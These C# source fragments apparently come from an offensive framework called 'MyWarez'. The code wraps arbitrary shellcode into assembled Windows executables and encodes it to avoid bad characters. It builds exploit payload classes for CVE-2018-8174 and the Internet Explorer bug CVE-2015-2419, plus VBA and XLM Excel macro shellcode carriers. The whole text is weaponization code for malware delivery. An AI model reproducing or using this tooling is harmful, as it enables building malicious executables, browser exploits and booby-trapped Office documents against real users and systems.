private static IEnumerable <AssemblySourceFile <YASM> > CreateSource(IShellcode shellcode, string symbolname, string sectionName = null, bool?sectionWritable = null) { var sourceFiles = new List <AssemblySourceFile <YASM> >(); var shellcodeFilename = Utils.RandomString(10) + ".bin"; sourceFiles.Add(new AssemblySourceFile <YASM>(shellcode.Bytes, shellcodeFilename)); string sectionLine; if (sectionName == null && !sectionWritable.HasValue) { sectionLine = "";//SECTION '{1}' {2} execute,read\r\n //sectionName, sectionWritable ? "write," : "" } else { sectionName = sectionName ?? ".text"; sectionLine = $"SECTION '{sectionName}'"; if (sectionWritable.HasValue && sectionWritable.Value) { sectionLine += " write, execute, read"; } sectionLine += "\r\n"; } var source = $"Global {symbolname}\r\n{sectionLine}{symbolname}:\r\n\tincbin '{shellcodeFilename}'"; sourceFiles.Add(new AssemblySourceFile <YASM>(source, Utils.RandomString(10) + ".asm")); return(sourceFiles); }
static Executable ShellcodeToExe(IShellcode shellcode, TargetArch targetArch) { switch (targetArch) { case TargetArch.x64: { var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad"); var staticLibrary = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm); var entryPoint = ((ICFunction)rawShellcodeAsm).Name; var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint); return(((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary)); } case TargetArch.x86: { var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: "SheSellsShellCodesByTheSilkRoad"); var staticLibrary = ((IAssembler <YASM, Win32ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm); var entryPoint = ((ICFunction)rawShellcodeAsm).Name; var linkerConfig = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint); var exe = ((ILinker <Win32ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(staticLibrary); return(exe); } default: throw new Exception(); } }
private static byte[] EncodeShellcode(IShellcode shellcode) { if (!ValidShellcodeArchs.Contains(shellcode.Arch)) { throw new ArgumentException(); } return(Utils.EncodeShellcode(shellcode.Bytes, shellcode.Arch, BadChars)); }
public RawShellcodeYasmAssemblySource(IShellcode shellcode, string symbolName, string sectionName = null, bool?sectionWritable = null) : base(CreateSource(shellcode, symbolName, sectionName, sectionWritable)) { SymbolName = symbolName; }
// Note: payload might execute twice public CVE_2018_8174(IShellcode shellcode) : base(string.Format(Template, Utils.TransformShellcode(shellcode.Bytes, shellcode.Arch, "js_le"))) { }
public ShellcodeVbaMacro(IShellcode shellcode) { Shellcode = shellcode; }
// Note: payload might fire twice // IE Exploit (CVE-2015-2419) public CVE_2015_2419(IShellcode shellcode) : base(string.Format(Template, Utils.BytesToJavaScriptArray(shellcode.Bytes))) { }
public ShellcodeXlmMacro(IShellcode shellcode) : base(ShellCodeToCellMatrix(EncodeShellcode(shellcode)), macroEnabled: true) { }